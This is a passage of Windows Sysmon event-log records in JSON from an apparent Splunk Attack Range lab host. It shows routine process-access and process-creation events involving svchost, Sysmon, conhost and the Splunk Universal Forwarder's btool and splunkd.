07:53:26.939","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1974,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.939\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.939","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1975,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.939\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.939","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1976,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.939\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.939","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1977,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.939\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.939","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1978,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.939\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F76-5F25-0000-00109CE10300}\r\nTargetProcessId: 3920\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.939","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F76-5F25-0000-00109CE10300}","TargetProcessId":"3920","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1979,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.946\r\nProcessGuid: {41C8662E-1F76-5F25-0000-001054E20300}\r\nProcessId: 3716\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool validate-regex --log-warnings\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1F76-5F25-0000-00109CE10300}\r\nParentProcessId: 3920\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-regex --log-warnings","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.946","ProcessGuid":"{41C8662E-1F76-5F25-0000-001054E20300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool validate-regex --log-warnings","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1F76-5F25-0000-00109CE10300}","ParentProcessId":"3920","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-regex --log-warnings","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1980,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.939\r\nSourceProcessGUID: {41C8662E-1F76-5F25-0000-00109CE10300}\r\nSourceProcessId: 3920\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {41C8662E-1F76-5F25-0000-001054E20300}\r\nTargetProcessId: 3716\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.939","SourceProcessGUID":"{41C8662E-1F76-5F25-0000-00109CE10300}","SourceProcessId":"3920","SourceThreadId":"3916","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{41C8662E-1F76-5F25-0000-001054E20300}","TargetProcessId":"3716","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1981,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.939\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F76-5F25-0000-001054E20300}\r\nTargetProcessId: 3716\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.939","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F76-5F25-0000-001054E20300}","TargetProcessId":"3716","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1982,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.939\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 